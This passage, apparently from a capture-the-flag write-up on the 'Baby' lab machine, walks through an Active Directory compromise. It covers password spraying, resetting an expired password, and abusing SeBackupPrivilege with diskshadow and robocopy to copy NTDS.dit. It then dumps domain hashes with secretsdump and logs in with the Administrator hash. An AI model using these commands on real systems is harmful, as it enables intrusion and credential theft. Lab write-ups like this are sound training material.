LDAP        10.129.20.55    389    BABYDC           userAccountControl   66080
LDAP        10.129.20.55    389    BABYDC           badPwdCount          0
LDAP        10.129.20.55    389    BABYDC           codePage             0
LDAP        10.129.20.55    389    BABYDC           countryCode          0
LDAP        10.129.20.55    389    BABYDC           badPasswordTime      0
LDAP        10.129.20.55    389    BABYDC           lastLogoff           0
LDAP        10.129.20.55    389    BABYDC           lastLogon            0
LDAP        10.129.20.55    389    BABYDC           pwdLastSet           132819812778759642
LDAP        10.129.20.55    389    BABYDC           primaryGroupID       513
LDAP        10.129.20.55    389    BABYDC           objectSid            S-1-5-21-1407081343-4001094062-1444647654-1114
LDAP        10.129.20.55    389    BABYDC           accountExpires       9223372036854775807
LDAP        10.129.20.55    389    BABYDC           logonCount           0
LDAP        10.129.20.55    389    BABYDC           sAMAccountName       Teresa.Bell
LDAP        10.129.20.55    389    BABYDC           sAMAccountType       805306368
LDAP        10.129.20.55    389    BABYDC           userPrincipalName    Teresa.Bell@baby.vl
LDAP        10.129.20.55    389    BABYDC           objectCategory       CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP        10.129.20.55    389    BABYDC           dSCorePropagationData 20211121163014.0Z
LDAP        10.129.20.55    389    BABYDC                                20211121162927.0Z
LDAP        10.129.20.55    389    BABYDC                                16010101000416.0Z
LDAP        10.129.20.55    389    BABYDC           msDS-SupportedEncryptionTypes 0

There’s a ton here. Teresa.Bell has the comment set with an initial password:

LDAP        10.129.20.55    389    BABYDC           description          Set initial password to BabyStart123!

Shell as Caroline.Robinson

Password Spray Fail

I’ll make a users list from the LDAP data and try to spray the password at them:

oxdf@hacky$ netexec smb BABYDC.baby.vl -u users -p 'BabyStart123!' --continue-on-success
SMB         10.129.20.55    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\dev:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Guest:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE 
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE 

No matches.

Password Spray Success

Looking at the LDAP data, there’s a user who didn’t make my list when I search for objectClass=*:

LDAP                     10.129.20.55    389    BABYDC           [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl

That’s because this user doesn’t have any data associated with them. But I can try to use the potential default password with them:

oxdf@hacky$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' 
SMB         10.129.20.55    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 

It fails, but in a way that say the password was correct, but that it must change!

Shell

Password Change

I’ll use the netexec module change-password to update Caroline.Robinson’s password. There is a password complexity requirement:

oxdf@hacky$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' -M change-password -o NEWPASS=0xdf0xdf
SMB         10.129.20.55    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 
CHANGE-P... 10.129.20.55    445    BABYDC           [-] SMB-SAMR password change failed: SAMR SessionError: code: 0xc000006c - STATUS_PASSWORD_RESTRICTION - When trying to update a password, this status indicates that some password update rule has been violated. For example, the password may not meet length criteria.

A more complex password works:

oxdf@hacky$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' -M change-password -o NEWPASS=0xdf0xdf....
SMB         10.129.20.55    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55    445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE 
CHANGE-P... 10.129.20.55    445    BABYDC           [+] Successfully changed password for Caroline.Robinson

Now I can list the password policy:

oxdf@hacky$ netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 0xdf0xdf.... --pass-pol
SMB         10.129.20.55   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55   445    BABYDC           [+] baby.vl\Caroline.Robinson:0xdf0xdf.... 
SMB         10.129.20.55   445    BABYDC           [+] Dumping password info for domain: BABY
SMB         10.129.20.55   445    BABYDC           Minimum password length: 7
SMB         10.129.20.55   445    BABYDC           Password history length: 24
SMB         10.129.20.55   445    BABYDC           Maximum password age: 41 days 23 hours 53 minutes 
SMB         10.129.20.55   445    BABYDC           
SMB         10.129.20.55   445    BABYDC           Password Complexity Flags: 000001
SMB         10.129.20.55   445    BABYDC               Domain Refuse Password Change: 0
SMB         10.129.20.55   445    BABYDC               Domain Password Store Cleartext: 0
SMB         10.129.20.55   445    BABYDC               Domain Password Lockout Admins: 0
SMB         10.129.20.55   445    BABYDC               Domain Password No Clear Change: 0
SMB         10.129.20.55   445    BABYDC               Domain Password No Anon Change: 0
SMB         10.129.20.55   445    BABYDC               Domain Password Complex: 1
SMB         10.129.20.55   445    BABYDC           
SMB         10.129.20.55   445    BABYDC           Minimum password age: 1 day 4 minutes 
SMB         10.129.20.55   445    BABYDC           Reset Account Lockout Counter: 30 minutes 
SMB         10.129.20.55   445    BABYDC           Locked Account Duration: 30 minutes 
SMB         10.129.20.55   445    BABYDC           Account Lockout Threshold: None
SMB         10.129.20.55   445    BABYDC           Forced Log off Time: Not Set

“0xdf0xdf” failed the “Domain Password Complex: 1”, which means there must be at least three of upper, lower, digit, and special, but this only has digit and lower.

WinRM

The new password works over WinRM:

oxdf@hacky$ netexec winrm BABYDC.baby.vl -u Caroline.Robinson -p 0xdf0xdf....
WINRM       10.129.20.55    5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) 
WINRM       10.129.20.55    5985   BABYDC           [+] baby.vl\Caroline.Robinson:0xdf0xdf.... (Pwn3d!)

I’ll get a shell with evil-winrm-py:

oxdf@hacky$ evil-winrm-py -i BABYDC.baby.vl -u Caroline.Robinson -p 0xdf0xdf....
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to 'BABYDC.baby.vl:5985' as 'Caroline.Robinson'
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents>

And grab user.txt:

evil-winrm-py PS C:\Users\Caroline.Robinson\Desktop> cat user.txt
79bb144d************************

Shell as Administrator

Enumeration

There are no other interesting users in C:\Users:

evil-winrm-py PS C:\Users> ls

    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         10/4/2024   3:33 PM                Administrator
d-----         7/27/2024  10:27 PM                Caroline.Robinson
d-r---        11/21/2021   3:29 PM                Public  

Unusually, Caroline.Robinson can list files in the Administrator user’s home directory:

evil-winrm-py PS C:\Users> tree /f .
Folder PATH listing
Volume serial number is 00000264 7DCD:94E1
C:\USERS
+---Administrator
¦   +---3D Objects
¦   +---Contacts
¦   +---Desktop
¦   ¦       root.txt
¦   ¦
¦   +---Documents
¦   +---Downloads
¦   +---Favorites
¦   ¦   ¦   Bing.url
¦   ¦   ¦
¦   ¦   +---Links
¦   +---Links
¦   ¦       Desktop.lnk
¦   ¦       Downloads.lnk
¦   ¦
¦   +---Music
¦   +---Pictures
¦   +---Saved Games
¦   +---Searches
¦   +---Videos
+---Caroline.Robinson
¦   +---Desktop
¦   ¦       user.txt
¦   ¦
¦   +---Documents
¦   +---Downloads
¦   +---Favorites
¦   +---Links
¦   +---Music
¦   +---Pictures
¦   +---Saved Games
¦   +---Videos
+---Public
    +---Documents
    +---Downloads
    +---Music
    +---Pictures
    +---Videos

They can’t access root.txt:

evil-winrm-py PS C:\Users\Administrator\Desktop> type root.txt
Access to the path 'C:\Users\Administrator\Desktop\root.txt' is denied.

Caroline.Robinson is in the well-known Microsoft group, Backup Operators:

evil-winrm-py PS C:\> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes                                        
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
BABY\it                                    Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288  

Being in this group gives SeBackupPrivilege and SeRestorePrivielge:

evil-winrm-py PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Exploit SeBackupPrivilege

Local Hashes

I have shown exploitation of SeBackupPrivilege several times before, most recently in Cicada. I’ll follow the same path here. I’ll use reg.py from my host to make a backup of the registry hive files:

oxdf@hacky$ reg.py 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to C:\windows\temp\SAM.save
[*] Saved HKLM\SYSTEM to C:\windows\temp\SYSTEM.save
[*] Saved HKLM\SECURITY to C:\windows\temp\SECURITY.save

I’m backing them up on Baby. In theory I can do this onto a SMB share I control, but I’ve found that to be unstable. Now I’ll download the files using evil-winrm-py:

evil-winrm-py PS C:\windows\temp> download SAM.save SAM.save
Downloading C:\windows\temp\SAM.save: 64.0kB [00:00, 371MB/s]                                                                          
[+] File downloaded successfully and saved as: /media/sf_CTFs/hackthebox/baby-10.129.20.55/SAM.save
evil-winrm-py PS C:\windows\temp> download SECURITY.save SECURITY.save
Downloading C:\windows\temp\SECURITY.save: 64.0kB [00:00, 337MB/s]                                                                     
[+] File downloaded successfully and saved as: /media/sf_CTFs/hackthebox/baby-10.129.20.55/SECURITY.save
evil-winrm-py PS C:\windows\temp> download SYSTEM.save SYSTEM.save
Downloading C:\windows\temp\SYSTEM.save: 19.9MB [00:08, 2.40MB/s]                                                                      
[+] File downloaded successfully and saved as: /media/sf_CTFs/hackthebox/baby-10.129.20.55/SYSTEM.save

I’ll dump the hashes from these using secretsdump.py:

oxdf@hacky$ secretsdump.py -sam SAM.save -system SYSTEM.save LOCAL

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 

Unfortunately, this hash doesn’t work:

oxdf@hacky$ netexec smb BABYDC.baby.vl -u Administrator -H 8d992faed38128ae85e95fa35868bb43
SMB         10.129.20.55  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55  445    BABYDC           [-] baby.vl\Administrator:8d992faed38128ae85e95fa35868bb43 STATUS_LOGON_FAILURE

Domain Hashes

To dump the domain hashes, I’ll want to get the C:\Windows\NTDS.dit file. Unfortunately, this file can’t just be copied as it is locked and in use. I can access it via a shadow copy, which I’ll generate with diskshadow and this script:

set verbose on
set context persistent nowriters
set metadata C:\Windows\Temp\0xdf.cab
add volume c: alias 0xdf
create
expose %0xdf% e:

I’ll save this and convert it to Windows newlines:

oxdf@hacky$ vim backup 
oxdf@hacky$ unix2dos backup 
unix2dos: converting file backup to DOS format...

I’ll upload it to Baby over evil-winrm-py and pass it to diskshadow:

evil-winrm-py PS C:\programdata> diskshadow /s C:\programdata\backup
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  9/19/2025 11:12:18 AM

-> set verbose on
-> set context persistent nowriters
-> set metadata C:\Windows\Temp\0xdf.cab
-> add volume c: alias 0xdf
-> create

Alias 0xdf for shadow ID {80e56935-d434-4518-bfa8-74886732b972} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {760373e3-c2df-46da-8fc5-a8cd3290262f} set as environment variable.
Inserted file Manifest.xml into .cab file 0xdf.cab
Inserted file Dis6D42.tmp into .cab file 0xdf.cab

Querying all shadow copies with the shadow copy set ID {760373e3-c2df-46da-8fc5-a8cd3290262f}

        * Shadow copy ID = {80e56935-d434-4518-bfa8-74886732b972}               %0xdf%
                - Shadow copy set: {760373e3-c2df-46da-8fc5-a8cd3290262f}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
                - Creation time: 9/19/2025 11:12:19 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: BabyDC.baby.vl
                - Service machine: BabyDC.baby.vl
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %0xdf% e:
-> %0xdf% = {80e56935-d434-4518-bfa8-74886732b972}
The shadow copy was successfully exposed as e:\.
->

Now there’s a copy of the C: drive at E::

evil-winrm-py PS C:\programdata> ls E:\

    Directory: E:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         8/19/2021   6:24 AM                EFI
d-----         4/16/2025   9:17 AM                inetpub
d-----          5/8/2021   8:20 AM                PerfLogs
d-r---         4/16/2025   8:35 AM                Program Files
d-----         4/16/2025   9:38 AM                Program Files (x86)
d-r---         7/27/2024  10:27 PM                Users
d-----         8/20/2025   9:07 AM                Windows   

I’ll use robocopy to get the NTDS.dit file out:

evil-winrm-py PS C:\programdata> robocopy /b E:\Windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Friday, September 19, 2025 11:12:24 AM
   Source : E:\Windows\ntds\
     Dest : C:\programdata\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    E:\Windows\ntds\
            New File              16.0 m        ntds.dit
  0.0%
  0.3%
  0.7%
  1.1%
  1.5%
  1.9%
  2.3%
  2.7%
  3.1%
  3.5%
  3.9%
  4.2%
  4.6%
  5.0%
  5.4%
  5.8%
  6.2%
  6.6%
  7.0%
  7.4%
  7.8%
  8.2%
  8.5%
  8.9%
  9.3%
  9.7%
 10.1%
 10.5%
 10.9%
 11.3%
 11.7%
 12.1%
 12.5%
 12.8%
 13.2%
 13.6%
 14.0%
 14.4%
 14.8%
 15.2%
 15.6%
 16.0%
 16.4%
 16.7%
 17.1%
 17.5%
 17.9%
 18.3%
 18.7%
 19.1%
 19.5%
 19.9%
 20.3%
 20.7%
 21.0%
 21.4%
 21.8%
 22.2%
 22.6%
 23.0%
 23.4%
 23.8%
 24.2%
 24.6%
 25.0%
 25.3%
 25.7%
 26.1%
 26.5%
 26.9%
 27.3%
 27.7%
 28.1%
 28.5%
 28.9%
 29.2%
 29.6%
 30.0%
 30.4%
 30.8%
 31.2%
 31.6%
 32.0%
 32.4%
 32.8%
 33.2%
 33.5%
 33.9%
 34.3%
 34.7%
 35.1%
 35.5%
 35.9%
 36.3%
 36.7%
 37.1%
 37.5%
 37.8%
 38.2%
 38.6%
 39.0%
 39.4%
 39.8%
 40.2%
 40.6%
 41.0%
 41.4%
 41.7%
 42.1%
 42.5%
 42.9%
 43.3%
 43.7%
 44.1%
 44.5%
 44.9%
 45.3%
 45.7%
 46.0%
 46.4%
 46.8%
 47.2%
 47.6%
 48.0%
 48.4%
 48.8%
 49.2%
 49.6%
 50.0%
 50.3%
 50.7%
 51.1%
 51.5%
 51.9%
 52.3%
 52.7%
 53.1%
 53.5%
 53.9%
 54.2%
 54.6%
 55.0%
 55.4%
 55.8%
 56.2%
 56.6%
 57.0%
 57.4%
 57.8%
 58.2%
 58.5%
 58.9%
 59.3%
 59.7%
 60.1%
 60.5%
 60.9%
 61.3%
 61.7%
 62.1%
 62.5%
 62.8%
 63.2%
 63.6%
 64.0%
 64.4%
 64.8%
 65.2%
 65.6%
 66.0%
 66.4%
 66.7%
 67.1%
 67.5%
 67.9%
 68.3%
 68.7%
 69.1%
 69.5%
 69.9%
 70.3%
 70.7%
 71.0%
 71.4%
 71.8%
 72.2%
 72.6%
 73.0%
 73.4%
 73.8%
 74.2%
 74.6%
 75.0%
 75.3%
 75.7%
 76.1%
 76.5%
 76.9%
 77.3%
 77.7%
 78.1%
 78.5%
 78.9%
 79.2%
 79.6%
 80.0%
 80.4%
 80.8%
 81.2%
 81.6%
 82.0%
 82.4%
 82.8%
 83.2%
 83.5%
 83.9%
 84.3%
 84.7%
 85.1%
 85.5%
 85.9%
 86.3%
 86.7%
 87.1%
 87.5%
 87.8%
 88.2%
 88.6%
 89.0%
 89.4%
 89.8%
 90.2%
 90.6%
 91.0%
 91.4%
 91.7%
 92.1%
 92.5%
 92.9%
 93.3%
 93.7%
 94.1%
 94.5%
 94.9%
 95.3%
 95.7%
 96.0%
 96.4%
 96.8%
 97.2%
 97.6%
 98.0%
 98.4%
 98.8%
 99.2%
 99.6%
100%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   16.00 m   16.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :           178,481,021 Bytes/sec.
   Speed :            10,212.766 MegaBytes/min.
   Ended : Friday, September 19, 2025 11:12:24 AM

Now it’s in programdata, where I can download a copy:

evil-winrm-py PS C:\programdata> ls ntds.dit

    Directory: C:\programdata

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/19/2025  11:08 AM       16777216 ntds.dit  
evil-winrm-py PS C:\programdata> download ntds.dit ntds.dit
Downloading C:\programdata\ntds.dit: 100%|████████████████████████████████████████████████████████| 16.0M/16.0M [00:05<00:00, 3.04MB/s]
[+] File downloaded successfully and saved as: /media/sf_CTFs/hackthebox/baby-10.129.20.55/ntds.dit

I’ll dump hashes from this using secretsdump.py:

oxdf@hacky$ secretsdump.py -ntds ntds.dit -system SYSTEM.save LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BABYDC$:1000:aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6da4842e8c24b99ad21a92d620893884:::
baby.vl\Jacqueline.Barnett:1104:aad3b435b51404eeaad3b435b51404ee:20b8853f7aa61297bfbc5ed2ab34aed8:::
baby.vl\Ashley.Webb:1105:aad3b435b51404eeaad3b435b51404ee:02e8841e1a2c6c0fa1f0becac4161f89:::
baby.vl\Hugh.George:1106:aad3b435b51404eeaad3b435b51404ee:f0082574cc663783afdbc8f35b6da3a1:::
baby.vl\Leonard.Dyer:1107:aad3b435b51404eeaad3b435b51404ee:b3b2f9c6640566d13bf25ac448f560d2:::
baby.vl\Ian.Walker:1108:aad3b435b51404eeaad3b435b51404ee:0e440fd30bebc2c524eaaed6b17bcd5c:::
baby.vl\Connor.Wilkinson:1110:aad3b435b51404eeaad3b435b51404ee:e125345993f6258861fb184f1a8522c9:::
baby.vl\Joseph.Hughes:1112:aad3b435b51404eeaad3b435b51404ee:31f12d52063773769e2ea5723e78f17f:::
baby.vl\Kerry.Wilson:1113:aad3b435b51404eeaad3b435b51404ee:181154d0dbea8cc061731803e601d1e4:::
baby.vl\Teresa.Bell:1114:aad3b435b51404eeaad3b435b51404ee:7735283d187b758f45c0565e22dc20d8:::
baby.vl\Caroline.Robinson:1115:aad3b435b51404eeaad3b435b51404ee:5fa67a134024d41bb4ff8bfd7da5e2b5:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:ad08cbabedff5acb70049bef721524a23375708cadefcb788704ba00926944f4
Administrator:aes128-cts-hmac-sha1-96:ac7aa518b36d5ea26de83c8d6aa6714d
Administrator:des-cbc-md5:d38cb994ae806b97
BABYDC$:aes256-cts-hmac-sha1-96:1a7d22edfaf3a8083f96a0270da971b4a42822181db117cf98c68c8f76bcf192
BABYDC$:aes128-cts-hmac-sha1-96:406b057cd3a92a9cc719f23b0821a45b
BABYDC$:des-cbc-md5:8fef68979223d645
krbtgt:aes256-cts-hmac-sha1-96:9c578fe1635da9e96eb60ad29e4e4ad90fdd471ea4dff40c0c4fce290a313d97
krbtgt:aes128-cts-hmac-sha1-96:1541c9f79887b4305064ddae9ba09e14
krbtgt:des-cbc-md5:d57383f1b3130de5
baby.vl\Jacqueline.Barnett:aes256-cts-hmac-sha1-96:851185add791f50bcdc027e0a0385eadaa68ac1ca127180a7183432f8260e084
baby.vl\Jacqueline.Barnett:aes128-cts-hmac-sha1-96:3abb8a49cf283f5b443acb239fd6f032
baby.vl\Jacqueline.Barnett:des-cbc-md5:01df1349548a206b
baby.vl\Ashley.Webb:aes256-cts-hmac-sha1-96:fc119502b9384a8aa6aff3ad659aa63bab9ebb37b87564303035357d10fa1039
baby.vl\Ashley.Webb:aes128-cts-hmac-sha1-96:81f5f99fd72fadd005a218b96bf17528
baby.vl\Ashley.Webb:des-cbc-md5:9267976186c1320e
baby.vl\Hugh.George:aes256-cts-hmac-sha1-96:0ea359386edf3512d71d3a3a2797a75db3168d8002a6929fd242eb7503f54258
baby.vl\Hugh.George:aes128-cts-hmac-sha1-96:50b966bdf7c919bfe8e85324424833dc
baby.vl\Hugh.George:des-cbc-md5:296bec86fd323b3e
baby.vl\Leonard.Dyer:aes256-cts-hmac-sha1-96:6d8fd945f9514fe7a8bbb11da8129a6e031fb504aa82ba1e053b6f51b70fdddd
baby.vl\Leonard.Dyer:aes128-cts-hmac-sha1-96:35fd9954c003efb73ded2fde9fc00d5a
baby.vl\Leonard.Dyer:des-cbc-md5:022313dce9a252c7
baby.vl\Ian.Walker:aes256-cts-hmac-sha1-96:54affe14ed4e79d9c2ba61713ef437c458f1f517794663543097ff1c2ae8a784
baby.vl\Ian.Walker:aes128-cts-hmac-sha1-96:78dbf35d77f29de5b7505ee88aef23df
baby.vl\Ian.Walker:des-cbc-md5:bcb094c2012f914c
baby.vl\Connor.Wilkinson:aes256-cts-hmac-sha1-96:55b0af76098dfe3731550e04baf1f7cb5b6da00de24c3f0908f4b2a2ea44475e
baby.vl\Connor.Wilkinson:aes128-cts-hmac-sha1-96:9d4af8203b2f9e3ecf64c1cbbcf8616b
baby.vl\Connor.Wilkinson:des-cbc-md5:fda762e362ab7ad3
baby.vl\Joseph.Hughes:aes256-cts-hmac-sha1-96:2e5f25b14f3439bfc901d37f6c9e4dba4b5aca8b7d944957651655477d440d41
baby.vl\Joseph.Hughes:aes128-cts-hmac-sha1-96:39fa92e8012f1b3f7be63c7ca9fd6723
baby.vl\Joseph.Hughes:des-cbc-md5:02f1cd9e52e0f245
baby.vl\Kerry.Wilson:aes256-cts-hmac-sha1-96:db5f7da80e369ee269cd5b0dbaea74bf7f7c4dfb3673039e9e119bd5518ea0fb
baby.vl\Kerry.Wilson:aes128-cts-hmac-sha1-96:aebbe6f21c76460feeebea188affbe01
baby.vl\Kerry.Wilson:des-cbc-md5:1f191c8c49ce07fe
baby.vl\Teresa.Bell:aes256-cts-hmac-sha1-96:8bb9cf1637d547b31993d9b0391aa9f771633c8f2ed8dd7a71f2ee5b5c58fc84
baby.vl\Teresa.Bell:aes128-cts-hmac-sha1-96:99bf021e937e1291cc0b6e4d01d96c66
baby.vl\Teresa.Bell:des-cbc-md5:4cbcdc3de6b50ee9
baby.vl\Caroline.Robinson:aes256-cts-hmac-sha1-96:6fe5d46e01d6cf9909f479fb4d7afac0bd973981dd958e730a734aa82c9e13af
baby.vl\Caroline.Robinson:aes128-cts-hmac-sha1-96:f34e6c0c8686a46eea8fd15a361601f9
baby.vl\Caroline.Robinson:des-cbc-md5:fd40190d579138df
[*] Cleaning up...

There’s a different Administrator hash!

Shell

The new hash works for the Administrator account on Baby:

oxdf@hacky$ netexec smb BABYDC.baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
SMB         10.129.20.55  445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.20.55  445    BABYDC           [+] baby.vl\Administrator:ee4457ae59f1e3fbd764e33d9cef123d (Pwn3d!)

I’ll get a shell:

oxdf@hacky$ evil-winrm-py -i BABYDC.baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.4.1

[*] Connecting to 'BABYDC.baby.vl:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents>

And the root flag:

evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
6083544b************************